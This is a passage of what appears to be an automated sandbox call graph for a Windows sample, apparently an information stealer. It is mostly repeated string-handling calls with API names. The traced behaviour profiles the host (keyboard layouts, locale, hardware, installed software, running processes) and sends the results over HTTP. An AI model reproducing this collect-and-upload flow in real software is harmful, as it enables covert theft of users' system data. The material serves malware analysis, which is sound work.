4 API calls 14522->14523 14524 5f4bb5 14523->14524 14525 60a8a0 lstrcpy 14524->14525 14526 5f4bbe 14525->14526 14527 60a9b0 4 API calls 14526->14527 14528 5f4bde 14527->14528 14529 60a8a0 lstrcpy 14528->14529 14530 5f4be7 14529->14530 14531 60a9b0 4 API calls 14530->14531 14532 5f4c06 14531->14532 14533 60a8a0 lstrcpy 14532->14533 14534 5f4c0f 14533->14534 14535 60a920 3 API calls 14534->14535 14536 5f4c2d 14535->14536 14537 60a8a0 lstrcpy 14536->14537 14538 5f4c36 14537->14538 14539 60a9b0 4 API calls 14538->14539 14540 5f4c55 14539->14540 14541 60a8a0 lstrcpy 14540->14541 14542 5f4c5e 14541->14542 14543 60a9b0 4 API calls 14542->14543 14544 5f4c7d 14543->14544 14545 60a8a0 lstrcpy 14544->14545 14546 5f4c86 14545->14546 14547 60a920 3 API calls 14546->14547 14548 5f4ca4 14547->14548 14549 60a8a0 lstrcpy 14548->14549 14550 5f4cad 14549->14550 14551 60a9b0 4 API calls 14550->14551 14552 5f4ccc 14551->14552 14553 60a8a0 lstrcpy 14552->14553 14554 5f4cd5 14553->14554 14555 60a9b0 4 API calls 14554->14555 14556 5f4cf6 14555->14556 14557 60a8a0 lstrcpy 14556->14557 14558 5f4cff 14557->14558 14559 60a9b0 4 API calls 14558->14559 14560 5f4d1f 14559->14560 14561 60a8a0 lstrcpy 14560->14561 14562 5f4d28 14561->14562 14563 60a9b0 4 API calls 14562->14563 14564 5f4d47 14563->14564 14565 60a8a0 lstrcpy 14564->14565 14566 5f4d50 14565->14566 14567 60a920 3 API calls 14566->14567 14568 5f4d6e 14567->14568 14569 60a8a0 lstrcpy 14568->14569 14570 5f4d77 14569->14570 14571 60a740 lstrcpy 14570->14571 14572 5f4d92 14571->14572 14573 60a920 3 API calls 14572->14573 14574 5f4db3 14573->14574 14575 60a920 3 API calls 14574->14575 14576 5f4dba 14575->14576 14577 60a8a0 lstrcpy 14576->14577 14578 5f4dc6 14577->14578 14579 5f4de7 lstrlen 14578->14579 14580 5f4dfa 14579->14580 14581 5f4e03 lstrlen 14580->14581 15520 60aad0 14581->15520 14583 5f4e13 HttpSendRequestA 14584 5f4e32 InternetReadFile 14583->14584 14585 5f4e67 InternetCloseHandle 14584->14585 14590 5f4e5e 14584->14590 14588 60a800 14585->14588 14587 60a9b0 4 API calls 14587->14590 14588->14509 14589 60a8a0 lstrcpy 14589->14590 14590->14584 14590->14585 14590->14587 14590->14589 15527 60aad0 14591->15527 14593 6017c4 StrCmpCA 14594 6017cf ExitProcess 14593->14594 14605 6017d7 14593->14605 14595 6019c2 14595->13514 14596 6018ad StrCmpCA 14596->14605 14597 6018cf StrCmpCA 14597->14605 14598 601970 StrCmpCA 14598->14605 14599 6018f1 StrCmpCA 14599->14605 14600 601951 StrCmpCA 14600->14605 14601 601932 StrCmpCA 14601->14605 14602 601913 StrCmpCA 14602->14605 14603 60185d StrCmpCA 14603->14605 14604 60187f StrCmpCA 14604->14605 14605->14595 14605->14596 14605->14597 14605->14598 14605->14599 14605->14600 14605->14601 14605->14602 14605->14603 14605->14604 14606 60a820 lstrlen lstrcpy 14605->14606 14606->14605 14608 60a7a0 lstrcpy 14607->14608 14609 5f5979 14608->14609 14610 5f47b0 2 API calls 14609->14610 14611 5f5985 14610->14611 14612 60a740 lstrcpy 14611->14612 14613 5f59ba 14612->14613 14614 60a740 lstrcpy 14613->14614 14615 5f59c7 14614->14615 14616 60a740 lstrcpy 14615->14616 14617 5f59d4 14616->14617 14618 60a740 lstrcpy 14617->14618 14619 5f59e1 14618->14619 14620 60a740 lstrcpy 14619->14620 14621 5f59ee InternetOpenA StrCmpCA 14620->14621 14622 5f5a1d 14621->14622 14623 5f5fc3 InternetCloseHandle 14622->14623 14624 608b60 3 API calls 14622->14624 14625 5f5fe0 14623->14625 14626 5f5a3c 14624->14626 14628 5f9ac0 4 API calls 14625->14628 14627 60a920 3 API calls 14626->14627 14629 5f5a4f 14627->14629 14630 5f5fe6 14628->14630 14631 60a8a0 lstrcpy 14629->14631 14632 60a820 2 API calls 14630->14632 14635 5f601f codecvt 14630->14635 14637 5f5a58 14631->14637 14633 5f5ffd 14632->14633 14634 60a9b0 4 API calls 14633->14634 14636 5f6013 14634->14636 14639 60a7a0 lstrcpy 14635->14639 14638 60a8a0 lstrcpy 14636->14638 14640 60a9b0 4 API calls 14637->14640 14638->14635 14648 5f604f 14639->14648 14641 5f5a82 14640->14641 14642 60a8a0 lstrcpy 14641->14642 14643 5f5a8b 14642->14643 14644 60a9b0 4 API calls 14643->14644 14645 5f5aaa 14644->14645 14646 60a8a0 lstrcpy 14645->14646 14647 5f5ab3 14646->14647 14649 60a920 3 API calls 14647->14649 14648->13520 14650 5f5ad1 14649->14650 14651 60a8a0 lstrcpy 14650->14651 14652 5f5ada 14651->14652 14653 60a9b0 4 API calls 14652->14653 14654 5f5af9 14653->14654 14655 60a8a0 lstrcpy 14654->14655 14656 5f5b02 14655->14656 14657 60a9b0 4 API calls 14656->14657 14658 5f5b21 14657->14658 14659 60a8a0 lstrcpy 14658->14659 14660 5f5b2a 14659->14660 14661 60a9b0 4 API calls 14660->14661 14662 5f5b56 14661->14662 14663 60a920 3 API calls 14662->14663 14664 5f5b5d 14663->14664 14665 60a8a0 lstrcpy 14664->14665 14666 5f5b66 14665->14666 14667 5f5b7c InternetConnectA 14666->14667 14667->14623 14668 5f5bac HttpOpenRequestA 14667->14668 14670 5f5c0b 14668->14670 14671 5f5fb6 InternetCloseHandle 14668->14671 14672 60a9b0 4 API calls 14670->14672 14671->14623 14673 5f5c1f 14672->14673 14674 60a8a0 lstrcpy 14673->14674 14675 5f5c28 14674->14675 14676 60a920 3 API calls 14675->14676 14677 5f5c46 14676->14677 14678 60a8a0 lstrcpy 14677->14678 14679 5f5c4f 14678->14679 14680 60a9b0 4 API calls 14679->14680 14681 5f5c6e 14680->14681 14682 60a8a0 lstrcpy 14681->14682 14683 5f5c77 14682->14683 14684 60a9b0 4 API calls 14683->14684 14685 5f5c98 14684->14685 14686 60a8a0 lstrcpy 14685->14686 14687 5f5ca1 14686->14687 14688 60a9b0 4 API calls 14687->14688 14689 5f5cc1 14688->14689 14690 60a8a0 lstrcpy 14689->14690 14691 5f5cca 14690->14691 14692 60a9b0 4 API calls 14691->14692 14693 5f5ce9 14692->14693 14694 60a8a0 lstrcpy 14693->14694 14695 5f5cf2 14694->14695 14696 60a920 3 API calls 14695->14696 14697 5f5d10 14696->14697 14698 60a8a0 lstrcpy 14697->14698 14699 5f5d19 14698->14699 14700 60a9b0 4 API calls 14699->14700 14701 5f5d38 14700->14701 14702 60a8a0 lstrcpy 14701->14702 14703 5f5d41 14702->14703 14704 60a9b0 4 API calls 14703->14704 14705 5f5d60 14704->14705 14706 60a8a0 lstrcpy 14705->14706 14707 5f5d69 14706->14707 14708 60a920 3 API calls 14707->14708 14709 5f5d87 14708->14709 14710 60a8a0 lstrcpy 14709->14710 14711 5f5d90 14710->14711 14712 60a9b0 4 API calls 14711->14712 14713 5f5daf 14712->14713 14714 60a8a0 lstrcpy 14713->14714 14715 5f5db8 14714->14715 14716 60a9b0 4 API calls 14715->14716 14717 5f5dd9 14716->14717 14718 60a8a0 lstrcpy 14717->14718 14719 5f5de2 14718->14719 14720 60a9b0 4 API calls 14719->14720 14721 5f5e02 14720->14721 14722 60a8a0 lstrcpy 14721->14722 14723 5f5e0b 14722->14723 14724 60a9b0 4 API calls 14723->14724 14725 5f5e2a 14724->14725 14726 60a8a0 lstrcpy 14725->14726 14727 5f5e33 14726->14727 14728 60a920 3 API calls 14727->14728 14729 5f5e54 14728->14729 14730 60a8a0 lstrcpy 14729->14730 14731 5f5e5d 14730->14731 14732 5f5e70 lstrlen 14731->14732 15528 60aad0 14732->15528 14734 5f5e81 lstrlen GetProcessHeap RtlAllocateHeap 15529 60aad0 14734->15529 14736 5f5eae lstrlen 14737 5f5ebe 14736->14737 14738 5f5ed7 lstrlen 14737->14738 14739 5f5ee7 14738->14739 14740 5f5ef0 lstrlen 14739->14740 14741 5f5f04 14740->14741 14742 5f5f1a lstrlen 14741->14742 15530 60aad0 14742->15530 14744 5f5f2a HttpSendRequestA 14745 5f5f35 InternetReadFile 14744->14745 14746 5f5f6a InternetCloseHandle 14745->14746 14750 5f5f61 14745->14750 14746->14671 14748 60a9b0 4 API calls 14748->14750 14749 60a8a0 lstrcpy 14749->14750 14750->14745 14750->14746 14750->14748 14750->14749 14753 601077 14751->14753 14752 601151 14752->13522 14753->14752 14754 60a820 lstrlen lstrcpy 14753->14754 14754->14753 14756 600db7 14755->14756 14757 600f17 14756->14757 14758 600ea4 StrCmpCA 14756->14758 14759 600e27 StrCmpCA 14756->14759 14760 600e67 StrCmpCA 14756->14760 14761 60a820 lstrlen lstrcpy 14756->14761 14757->13530 14758->14756 14759->14756 14760->14756 14761->14756 14765 600f67 14762->14765 14763 601044 14763->13538 14764 600fb2 StrCmpCA 14764->14765 14765->14763 14765->14764 14766 60a820 lstrlen lstrcpy 14765->14766 14766->14765 14768 60a740 lstrcpy 14767->14768 14769 601a26 14768->14769 14770 60a9b0 4 API calls 14769->14770 14771 601a37 14770->14771 14772 60a8a0 lstrcpy 14771->14772 14773 601a40 14772->14773 14774 60a9b0 4 API calls 14773->14774 14775 601a5b 14774->14775 14776 60a8a0 lstrcpy 14775->14776 14777 601a64 14776->14777 14778 60a9b0 4 API calls 14777->14778 14779 601a7d 14778->14779 14780 60a8a0 lstrcpy 14779->14780 14781 601a86 14780->14781 14782 60a9b0 4 API calls 14781->14782 14783 601aa1 14782->14783 14784 60a8a0 lstrcpy 14783->14784 14785 601aaa 14784->14785 14786 60a9b0 4 API calls 14785->14786 14787 601ac3 14786->14787 14788 60a8a0 lstrcpy 14787->14788 14789 601acc 14788->14789 14790 60a9b0 4 API calls 14789->14790 14791 601ae7 14790->14791 14792 60a8a0 lstrcpy 14791->14792 14793 601af0 14792->14793 14794 60a9b0 4 API calls 14793->14794 14795 601b09 14794->14795 14796 60a8a0 lstrcpy 14795->14796 14797 601b12 14796->14797 14798 60a9b0 4 API calls 14797->14798 14799 601b2d 14798->14799 14800 60a8a0 lstrcpy 14799->14800 14801 601b36 14800->14801 14802 60a9b0 4 API calls 14801->14802 14803 601b4f 14802->14803 14804 60a8a0 lstrcpy 14803->14804 14805 601b58 14804->14805 14806 60a9b0 4 API calls 14805->14806 14807 601b76 14806->14807 14808 60a8a0 lstrcpy 14807->14808 14809 601b7f 14808->14809 14810 607500 6 API calls 14809->14810 14811 601b96 14810->14811 14812 60a920 3 API calls 14811->14812 14813 601ba9 14812->14813 14814 60a8a0 lstrcpy 14813->14814 14815 601bb2 14814->14815 14816 60a9b0 4 API calls 14815->14816 14817 601bdc 14816->14817 14818 60a8a0 lstrcpy 14817->14818 14819 601be5 14818->14819 14820 60a9b0 4 API calls 14819->14820 14821 601c05 14820->14821 14822 60a8a0 lstrcpy 14821->14822 14823 601c0e 14822->14823 15531 607690 GetProcessHeap RtlAllocateHeap 14823->15531 14826 60a9b0 4 API calls 14827 601c2e 14826->14827 14828 60a8a0 lstrcpy 14827->14828 14829 601c37 14828->14829 14830 60a9b0 4 API calls 14829->14830 14831 601c56 14830->14831 14832 60a8a0 lstrcpy 14831->14832 14833 601c5f 14832->14833 14834 60a9b0 4 API calls 14833->14834 14835 601c80 14834->14835 14836 60a8a0 lstrcpy 14835->14836 14837 601c89 14836->14837 15538 6077c0 GetCurrentProcess IsWow64Process 14837->15538 14840 60a9b0 4 API calls 14841 601ca9 14840->14841 14842 60a8a0 lstrcpy 14841->14842 14843 601cb2 14842->14843 14844 60a9b0 4 API calls 14843->14844 14845 601cd1 14844->14845 14846 60a8a0 lstrcpy 14845->14846 14847 601cda 14846->14847 14848 60a9b0 4 API calls 14847->14848 14849 601cfb 14848->14849 14850 60a8a0 lstrcpy 14849->14850 14851 601d04 14850->14851 14852 607850 3 API calls 14851->14852 14853 601d14 14852->14853 14854 60a9b0 4 API calls 14853->14854 14855 601d24 14854->14855 14856 60a8a0 lstrcpy 14855->14856 14857 601d2d 14856->14857 14858 60a9b0 4 API calls 14857->14858 14859 601d4c 14858->14859 14860 60a8a0 lstrcpy 14859->14860 14861 601d55 14860->14861 14862 60a9b0 4 API calls 14861->14862 14863 601d75 14862->14863 14864 60a8a0 lstrcpy 14863->14864 14865 601d7e 14864->14865 14866 6078e0 3 API calls 14865->14866 14867 601d8e 14866->14867 14868 60a9b0 4 API calls 14867->14868 14869 601d9e 14868->14869 14870 60a8a0 lstrcpy 14869->14870 14871 601da7 14870->14871 14872 60a9b0 4 API calls 14871->14872 14873 601dc6 14872->14873 14874 60a8a0 lstrcpy 14873->14874 14875 601dcf 14874->14875 14876 60a9b0 4 API calls 14875->14876 14877 601df0 14876->14877 14878 60a8a0 lstrcpy 14877->14878 14879 601df9 14878->14879 15540 607980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14879->15540 14882 60a9b0 4 API calls 14883 601e19 14882->14883 14884 60a8a0 lstrcpy 14883->14884 14885 601e22 14884->14885 14886 60a9b0 4 API calls 14885->14886 14887 601e41 14886->14887 14888 60a8a0 lstrcpy 14887->14888 14889 601e4a 14888->14889 14890 60a9b0 4 API calls 14889->14890 14891 601e6b 14890->14891 14892 60a8a0 lstrcpy 14891->14892 14893 601e74 14892->14893 15542 607a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14893->15542 14896 60a9b0 4 API calls 14897 601e94 14896->14897 14898 60a8a0 lstrcpy 14897->14898 14899 601e9d 14898->14899 14900 60a9b0 4 API calls 14899->14900 14901 601ebc 14900->14901 14902 60a8a0 lstrcpy 14901->14902 14903 601ec5 14902->14903 14904 60a9b0 4 API calls 14903->14904 14905 601ee5 14904->14905 14906 60a8a0 lstrcpy 14905->14906 14907 601eee 14906->14907 15545 607b00 GetUserDefaultLocaleName 14907->15545 14910 60a9b0 4 API calls 14911 601f0e 14910->14911 14912 60a8a0 lstrcpy 14911->14912 14913 601f17 14912->14913 14914 60a9b0 4 API calls 14913->14914 14915 601f36 14914->14915 14916 60a8a0 lstrcpy 14915->14916 14917 601f3f 14916->14917 14918 60a9b0 4 API calls 14917->14918 14919 601f60 14918->14919 14920 60a8a0 lstrcpy 14919->14920 14921 601f69 14920->14921 15549 607b90 14921->15549 14923 601f80 14924 60a920 3 API calls 14923->14924 14925 601f93 14924->14925 14926 60a8a0 lstrcpy 14925->14926 14927 601f9c 14926->14927 14928 60a9b0 4 API calls 14927->14928 14929 601fc6 14928->14929 14930 60a8a0 lstrcpy 14929->14930 14931 601fcf 14930->14931 14932 60a9b0 4 API calls 14931->14932 14933 601fef 14932->14933 14934 60a8a0 lstrcpy 14933->14934 14935 601ff8 14934->14935 15561 607d80 GetSystemPowerStatus 14935->15561 14938 60a9b0 4 API calls 14939 602018 14938->14939 14940 60a8a0 lstrcpy 14939->14940 14941 602021 14940->14941 14942 60a9b0 4 API calls 14941->14942 14943 602040 14942->14943 14944 60a8a0 lstrcpy 14943->14944 14945 602049 14944->14945 14946 60a9b0 4 API calls 14945->14946 14947 60206a 14946->14947 14948 60a8a0 lstrcpy 14947->14948 14949 602073 14948->14949 14950 60207e GetCurrentProcessId 14949->14950 15563 609470 OpenProcess 14950->15563 14953 60a920 3 API calls 14954 6020a4 14953->14954 14955 60a8a0 lstrcpy 14954->14955 14956 6020ad 14955->14956 14957 60a9b0 4 API calls 14956->14957 14958 6020d7 14957->14958 14959 60a8a0 lstrcpy 14958->14959 14960 6020e0 14959->14960 14961 60a9b0 4 API calls 14960->14961 14962 602100 14961->14962 14963 60a8a0 lstrcpy 14962->14963 14964 602109 14963->14964 15568 607e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14964->15568 14967 60a9b0 4 API calls 14968 602129 14967->14968 14969 60a8a0 lstrcpy 14968->14969 14970 602132 14969->14970 14971 60a9b0 4 API calls 14970->14971 14972 602151 14971->14972 14973 60a8a0 lstrcpy 14972->14973 14974 60215a 14973->14974 14975 60a9b0 4 API calls 14974->14975 14976 60217b 14975->14976 14977 60a8a0 lstrcpy 14976->14977 14978 602184 14977->14978 15572 607f60 14978->15572 14981 60a9b0 4 API calls 14982 6021a4 14981->14982 14983 60a8a0 lstrcpy 14982->14983 14984 6021ad 14983->14984 14985 60a9b0 4 API calls 14984->14985 14986 6021cc 14985->14986 14987 60a8a0 lstrcpy 14986->14987 14988 6021d5 14987->14988 14989 60a9b0 4 API calls 14988->14989 14990 6021f6 14989->14990 14991 60a8a0 lstrcpy 14990->14991 14992 6021ff 14991->14992 15585 607ed0 GetSystemInfo wsprintfA 14992->15585 14995 60a9b0 4 API calls 14996 60221f 14995->14996 14997 60a8a0 lstrcpy 14996->14997 14998 602228 14997->14998 14999 60a9b0 4 API calls 14998->14999 15000 602247 14999->15000 15001 60a8a0 lstrcpy 15000->15001 15002 602250 15001->15002 15003 60a9b0 4 API calls 15002->15003 15004 602270 15003->15004 15005 60a8a0 lstrcpy 15004->15005 15006 602279 15005->15006 15587 608100 GetProcessHeap RtlAllocateHeap 15006->15587 15009 60a9b0 4 API calls 15010 602299 15009->15010 15011 60a8a0 lstrcpy 15010->15011 15012 6022a2 15011->15012 15013 60a9b0 4 API calls 15012->15013 15014 6022c1 15013->15014 15015 60a8a0 lstrcpy 15014->15015 15016 6022ca 15015->15016 15017 60a9b0 4 API calls 15016->15017 15018 6022eb 15017->15018 15019 60a8a0 lstrcpy 15018->15019 15020 6022f4 15019->15020 15593 6087c0 15020->15593 15023 60a920 3 API calls 15024 60231e 15023->15024 15025 60a8a0 lstrcpy 15024->15025 15026 602327 15025->15026 15027 60a9b0 4 API calls 15026->15027 15028 602351 15027->15028 15029 60a8a0 lstrcpy 15028->15029 15030 60235a 15029->15030 15031 60a9b0 4 API calls 15030->15031 15032 60237a 15031->15032 15033 60a8a0 lstrcpy 15032->15033 15034 602383 15033->15034 15035 60a9b0 4 API calls 15034->15035 15036 6023a2 15035->15036 15037 60a8a0 lstrcpy 15036->15037 15038 6023ab 15037->15038 15598 6081f0 15038->15598 15040 6023c2 15041 60a920 3 API calls 15040->15041 15042 6023d5 15041->15042 15043 60a8a0 lstrcpy 15042->15043 15044 6023de 15043->15044 15045 60a9b0 4 API calls 15044->15045 15046 60240a 15045->15046 15047 60a8a0 lstrcpy 15046->15047 15048 602413 15047->15048 15049 60a9b0 4 API calls 15048->15049 15050 602432 15049->15050 15051 60a8a0 lstrcpy 15050->15051 15052 60243b 15051->15052 15053 60a9b0 4 API calls 15052->15053 15054 60245c 15053->15054 15055 60a8a0 lstrcpy 15054->15055 15056 602465 15055->15056 15057 60a9b0 4 API calls 15056->15057 15058 602484 15057->15058 15059 60a8a0 lstrcpy 15058->15059 15060 60248d 15059->15060 15061 60a9b0 4 API calls 15060->15061 15062 6024ae 15061->15062 15063 60a8a0 lstrcpy 15062->15063 15064 6024b7 15063->15064 15606 608320 15064->15606 15066 6024d3 15067 60a920 3 API calls 15066->15067 15068 6024e6 15067->15068 15069 60a8a0 lstrcpy 15068->15069 15070 6024ef 15069->15070 15071 60a9b0 4 API calls 15070->15071 15072 602519 15071->15072 15073 60a8a0 lstrcpy 15072->15073 15074 602522 15073->15074 15075 60a9b0 4 API calls 15074->15075 15076 602543 15075->15076 15077 60a8a0 lstrcpy 15076->15077 15078 60254c 15077->15078 15079 608320 17 API calls 15078->15079 15080 602568 15079->15080 15081 60a920 3 API calls 15080->15081 15082 60257b 15081->15082 15083 60a8a0 lstrcpy 15082->15083 15084 602584 15083->15084 15085 60a9b0 4 API calls 15084->15085 15086 6025ae 15085->15086 15087 60a8a0 lstrcpy 15086->15087 15088 6025b7 15087->15088 15089 60a9b0 4 API calls 15088->15089 15090 6025d6 15089->15090 15091 60a8a0 lstrcpy 15090->15091 15092 6025df 15091->15092 15093 60a9b0 4 API calls 15092->15093 15094 602600 15093->15094 15095 60a8a0 lstrcpy 15094->15095 15096 602609 15095->15096 15642 608680 15096->15642 15098 602620 15099 60a920 3 API calls 15098->15099 15100 602633 15099->15100 15101 60a8a0 lstrcpy 15100->15101 15102 60263c 15101->15102 15103 60265a lstrlen 15102->15103 15104 60266a 15103->15104 15105 60a740 lstrcpy 15104->15105 15106 60267c 15105->15106 15107 5f1590 lstrcpy 15106->15107 15108 60268d 15107->15108 15652 605190 15108->15652 15110 602699 15110->13542 15840 60aad0 15111->15840 15113 5f5009 InternetOpenUrlA 15114 5f5021 15113->15114 15115 5f502a InternetReadFile 15114->15115 15116 5f50a0 InternetCloseHandle InternetCloseHandle 15114->15116 15115->15114 15117 5f50ec 15116->15117 15117->13546 15841 5f98d0 15118->15841 15120 600759 15121 600a38 15120->15121 15122 60077d 15120->15122 15123 5f1590 lstrcpy 15121->15123 15125 600799 StrCmpCA 15122->15125 15124 600a49 15123->15124 16017 600250 15124->16017 15127 6007a8 15125->15127 15153 600843 15125->15153 15129 60a7a0 lstrcpy 15127->15129 15131 6007c3 15129->15131 15130 600865 StrCmpCA 15132 600874 15130->15132 15170 60096b 15130->15170 15133 5f1590 lstrcpy 15131->15133 15134 60a740 lstrcpy 15132->15134 15135 60080c 15133->15135 15137 600881 15134->15137 15138 60a7a0 lstrcpy 15135->15138 15136 60099c StrCmpCA 15139 6009ab 15136->15139 15159 600a2d 15136->15159 15140 60a9b0 4 API calls 15137->15140 15141 600823 15138->15141 15142 5f1590 lstrcpy 15139->15142 15143 6008ac 15140->15143 15144 60a7a0 lstrcpy 15141->15144 15145 6009f4 15142->15145 15146 60a920 3 API calls 15143->15146 15147 60083e 15144->15147 15148 60a7a0 lstrcpy 15145->15148 15149 6008b3 15146->15149 15844 5ffb00 15147->15844 15151 600a0d 15148->15151 15152 60a9b0 4 API calls 15149->15152 15154 60a7a0 lstrcpy 15151->15154 15155 6008ba 15152->15155 15153->15130 15156 600a28 15154->15156 15157 60a8a0 lstrcpy 15155->15157 15960 600030 15156->15960 15159->13550 15170->15136 15492 60a7a0 lstrcpy 15491->15492 15493 5f1683 15492->15493 15494 60a7a0 lstrcpy 15493->15494 15495 5f1695 15494->15495 15496 60a7a0 lstrcpy 15495->15496 15497 5f16a7 15496->15497 15498 60a7a0 lstrcpy 15497->15498 15499 5f15a3 15498->15499 15499->14373 15501 5f47c6 15500->15501 15502 5f4838 lstrlen 15501->15502 15526 60aad0 15502->15526 15504 5f4848 InternetCrackUrlA 15505 5f4867 15504->15505 15505->14450 15507 60a740 lstrcpy 15506->15507 15508 608b74 15507->15508 15509 60a740 lstrcpy 15508->15509 15510 608b82 GetSystemTime 15509->15510 15513 608b99 15510->15513 15511 60a7a0 lstrcpy 15512 608bfc 15511->15512 15512->14465 15513->15511 15515 60a931 15514->15515 15516 60a988 15515->15516 15518 60a968 lstrcpy lstrcat 15515->15518 15517 60a7a0 lstrcpy 15516->15517 15519 60a994 15517->15519 15518->15516 15519->14468 15520->14583 15522 5f4eee 15521->15522 15523 5f9af9 LocalAlloc 15521->15523 15522->14471 15522->14473 15523->15522 15524 5f9b14 CryptStringToBinaryA 15523->15524 15524->15522 15525 5f9b39 LocalFree 15524->15525 15525->15522 15526->15504 15527->14593 15528->14734 15529->14736 15530->14744 15659 6077a0 15531->15659 15534 6076c6 RegOpenKeyExA 15535 607704 RegCloseKey 15534->15535 15536 6076e7 RegQueryValueExA 15534->15536 15537 601c1e 15535->15537 15536->15535 15537->14826 15539 601c99 15538->15539 15539->14840 15541 601e09 15540->15541 15541->14882 15543 601e84 15542->15543 15544 607a9a wsprintfA 15542->15544 15543->14896 15544->15543 15546 601efe 15545->15546 15547 607b4d 15545->15547 15546->14910 15666 608d20 LocalAlloc CharToOemW 15547->15666 15550 60a740 lstrcpy 15549->15550 15551 607bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15550->15551 15560 607c25 15551->15560 15552 607c46 GetLocaleInfoA 15552->15560 15553 607d18 15554 607d28 15553->15554 15555 607d1e LocalFree 15553->15555 15556 60a7a0 lstrcpy 15554->15556 15555->15554 15559 607d37 15556->15559 15557 60a8a0 lstrcpy 15557->15560 15558 60a9b0 lstrcpy lstrlen lstrcpy lstrcat 15558->15560 15559->14923 15560->15552 15560->15553 15560->15557 15560->15558 15562 602008 15561->15562 15562->14938 15564 609493 GetModuleFileNameExA CloseHandle 15563->15564 15565 6094b5 15563->15565 15564->15565 15566 60a740 lstrcpy 15565->15566 15567 602091 15566->15567 15567->14953 15569 602119 15568->15569 15570 607e68 RegQueryValueExA 15568->15570 15569->14967 15571 607e8e RegCloseKey 15570->15571 15571->15569 15573 607fb9 GetLogicalProcessorInformationEx 15572->15573 15574 607fd8 GetLastError 15573->15574 15576 608029 15573->15576 15575 608022 15574->15575 15583 607fe3 15574->15583 15577 602194 15575->15577 15580 6089f0 2 API calls 15575->15580 15581 6089f0 2 API calls 15576->15581 15577->14981 15580->15577 15582 60807b 15581->15582 15582->15575 15584 608084 wsprintfA 15582->15584 15583->15573 15583->15577 15667 6089f0 15583->15667 15670 608a10 GetProcessHeap RtlAllocateHeap 15583->15670 15584->15577 15586 60220f 15585->15586 15586->14995 15588 6089b0 15587->15588 15589 60814d GlobalMemoryStatusEx 15588->15589 15592 608163 15589->15592 15590 60819b wsprintfA 15591 602289 15590->15591 15591->15009 15592->15590 15594 6087fb GetProcessHeap RtlAllocateHeap wsprintfA 15593->15594 15596 60a740 lstrcpy 15594->15596 15597 60230b 15596->15597 15597->15023 15599 60a740 lstrcpy 15598->15599 15603 608229 15599->15603 15600 608263 15602 60a7a0 lstrcpy 15600->15602 15601 60a9b0 lstrcpy lstrlen lstrcpy lstrcat 15601->15603 15604 6082dc 15602->15604 15603->15600 15603->15601 15605 60a8a0 lstrcpy 15603->15605 15604->15040 15605->15603 15607 60a740 lstrcpy 15606->15607 15608 60835c RegOpenKeyExA 15607->15608 15609 6083d0 15608->15609 15610 6083ae 15608->15610 15612 608613 RegCloseKey 15609->15612 15613 6083f8 RegEnumKeyExA 15609->15613 15611 60a7a0 lstrcpy 15610->15611 15622 6083bd 15611->15622 15616 60a7a0 lstrcpy 15612->15616 15614 60860e 15613->15614 15615 60843f wsprintfA RegOpenKeyExA 15613->15615 15614->15612 15617 6084c1 RegQueryValueExA 15615->15617 15618 608485 RegCloseKey RegCloseKey 15615->15618 15616->15622 15620 608601 RegCloseKey 15617->15620 15621 6084fa lstrlen 15617->15621 15619 60a7a0 lstrcpy 15618->15619 15619->15622 15620->15614 15621->15620 15623 608510 15621->15623 15622->15066 15624 60a9b0 4 API calls 15623->15624 15625 608527 15624->15625 15626 60a8a0 lstrcpy 15625->15626 15627 608533 15626->15627 15628 60a9b0 4 API calls 15627->15628 15629 608557 15628->15629 15630 60a8a0 lstrcpy 15629->15630 15631 608563 15630->15631 15632 60856e RegQueryValueExA 15631->15632 15632->15620 15633 6085a3 15632->15633 15634 60a9b0 4 API calls 15633->15634 15635 6085ba 15634->15635 15636 60a8a0 lstrcpy 15635->15636 15637 6085c6 15636->15637 15638 60a9b0 4 API calls 15637->15638 15639 6085ea 15638->15639 15640 60a8a0 lstrcpy 15639->15640 15641 6085f6 15640->15641 15641->15620 15643 60a740 lstrcpy 15642->15643 15644 6086bc CreateToolhelp32Snapshot Process32First 15643->15644 15645 6086e8 Process32Next 15644->15645 15646 60875d CloseHandle 15644->15646 15645->15646 15651 6086fd 15645->15651 15647 60a7a0 lstrcpy 15646->15647 15648 608776 15647->15648 15648->15098 15649 60a9b0 lstrcpy lstrlen lstrcpy lstrcat 15649->15651 15650 60a8a0 lstrcpy 15650->15651 15651->15645 15651->15649 15651->15650 15653 60a7a0 lstrcpy 15652->15653 15654 6051b5 15653->15654 15655 5f1590 lstrcpy 15654->15655 15656 6051c6 15655->15656 15671 5f5100 15656->15671 15658 6051cf 15658->15110 15662 607720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15659->15662 15661 6076b9 15661->15534 15661->15537 15663 607780 RegCloseKey 15662->15663 15664 607765 RegQueryValueExA 15662->15664 15665 607793 15663->15665 15664->15663 15665->15661 15666->15546 15668 6089f9 GetProcessHeap HeapFree 15667->15668 15669 608a0c 15667->15669 15668->15669 15669->15583 15670->15583 15672 60a7a0 lstrcpy 15671->15672 15673 5f5119 15672->15673 15674 5f47b0 2 API calls 15673->15674 15675 5f5125 15674->15675 15831 608ea0 15675->15831 15677 5f5184 15678 5f5192 lstrlen 15677->15678 15679 5f51a5 15678->15679 15680 608ea0 4 API calls 15679->15680 15681 5f51b6 15680->15681 15682 60a740 lstrcpy 15681->15682 15683 5f51c9 15682->15683 15684 60a740 lstrcpy 15683->15684 15685 5f51d6 15684->15685 15686 60a740 lstrcpy 15685->15686 15687 5f51e3 15686->15687 15688 60a740 lstrcpy 15687->15688 15689 5f51f0 15688->15689 15690 60a740 lstrcpy 15689->15690 15691 5f51fd InternetOpenA StrCmpCA 15690->15691 15692 5f522f 15691->15692 15693 5f58c4 InternetCloseHandle 15692->15693 15694 608b60 3 API calls 15692->15694 15700 5f58d9 codecvt 15693->15700 15695 5f524e 15694->15695 15696 60a920 3 API calls 15695->15696 15697 5f5261 15696->15697 15698 60a8a0 lstrcpy 15697->15698 15699 5f526a 15698->15699 15701 60a9b0 4 API calls 15699->15701 15704 60a7a0 lstrcpy 15700->15704 15702 5f52ab 15701->15702 15703 60a920 3 API calls 15702->15703 15705 5f52b2 15703->15705 15712 5f5913 15704->15712 15706 60a9b0 4 API calls 15705->15706 15707 5f52b9 15706->15707 15708 60a8a0 lstrcpy 15707->15708 15709 5f52c2 15708->15709 15710 60a9b0 4 API calls 15709->15710 15711 5f5303 15710->15711 15713 60a920 3 API calls 15711->15713 15712->15658 15714 5f530a 15713->15714 15715 60a8a0 lstrcpy 